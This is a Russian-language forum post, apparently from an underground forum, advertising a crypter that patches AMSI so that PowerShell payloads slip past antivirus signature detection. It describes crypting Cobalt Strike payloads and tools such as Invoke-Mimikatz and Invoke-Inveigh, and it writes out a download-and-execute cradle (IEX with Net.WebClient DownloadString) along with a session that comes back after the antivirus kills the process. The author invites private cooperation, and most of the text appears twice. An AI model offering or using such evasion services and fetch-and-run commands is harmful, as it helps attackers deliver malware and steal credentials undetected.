Есть обфускатор/кодогенератор, который патчит амси и запускает powershell скрипт, что позволяет обойти сигнатурный анализ антивирусов.
Провожу тесты своего движка на безвозмездной основе.
Например Вы генерируете payload Cobalt Strike в powershell скрипте и кидаете мне код. Я в свою очередь "криптую" и высылаю пш команду IEX (New-Object Net.WebClient).DownloadString('URL').
Исполнив эту команду Вы запускаете свой payload cobalt strike'а. Если антивирус детектит процесс powershell.exe и убивает, то через пару секунд сессия обратно восстанавливается после детекта.
Так же могу криптануть: Invoke-Mimikatz, Invoke-Inveigh, Invoke-ShareFinder и т.д. Список можно продолжать бесконечно.
p.s. Готов уйти в приват + открыт на сотрудничество.
p.s.s. за контактами в pm.
Провожу тесты своего движка на безвозмездной основе.
Например Вы генерируете payload Cobalt Strike в powershell скрипте и кидаете мне код. Я в свою очередь "криптую" и высылаю пш команду IEX (New-Object Net.WebClient).DownloadString('URL').
Исполнив эту команду Вы запускаете свой payload cobalt strike'а. Если антивирус детектит процесс powershell.exe и убивает, то через пару секунд сессия обратно восстанавливается после детекта.
Так же могу криптануть: Invoke-Mimikatz, Invoke-Inveigh, Invoke-ShareFinder и т.д. Список можно продолжать бесконечно.
p.s. Готов уйти в приват + открыт на сотрудничество.
p.s.s. за контактами в pm.
